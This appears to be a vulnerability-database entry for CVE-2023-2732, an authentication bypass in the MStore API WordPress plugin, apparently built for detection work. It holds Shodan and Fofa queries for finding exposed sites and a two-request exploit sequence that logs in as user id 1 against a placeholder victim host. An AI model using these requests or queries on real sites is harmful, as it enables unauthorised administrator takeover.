🔙 목록으로 돌아가기

CVE-2023-2732: MStore API <= 3.9.2 - Authentication Bypass

TitleMStore API <= 3.9.2 - Authentication Bypass
AuthorDhiyaneshDK
SeverityCritical
ImpactAn attacker can bypass authentication and gain unauthorized access to the MStore API, potentially leading to data breaches or unauthorized actions.
RemediationUpgrade to a patched version of MStore API (version 3.9.3 or above) to mitigate the authentication bypass vulnerability.
CVSS Score9.8
EPSS Score0.90424
CVE IDCVE-2023-2732
CWE IDCWE-288,NVD-CWE-Other
Shodan Queryhttp.html:/wp-content/plugins/mstore-api/
Fofa Querybody=/wp-content/plugins/mstore-api/
Tags cve2023 cve wordpress wp wp-plugin auth-bypass mstore-api inspireui vkev vuln

🔍 Vulnerability Description

The MStore API plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.9.2. This is due to insufficient verification on the user being supplied during the add listing REST API request through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the user id.

🌐 HTTP Request

GET /wp-json/wp/v2/add-listing?id=1 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.5 Safari/605.1.15 AlohaBrowser/7.6.0
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
GET /wp-admin/profile.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.5.20) Gecko/ Firefox/3.6.19
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-2732.yaml

🦈 Packet Capture: ⬇️ Download cve-2023-2732.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A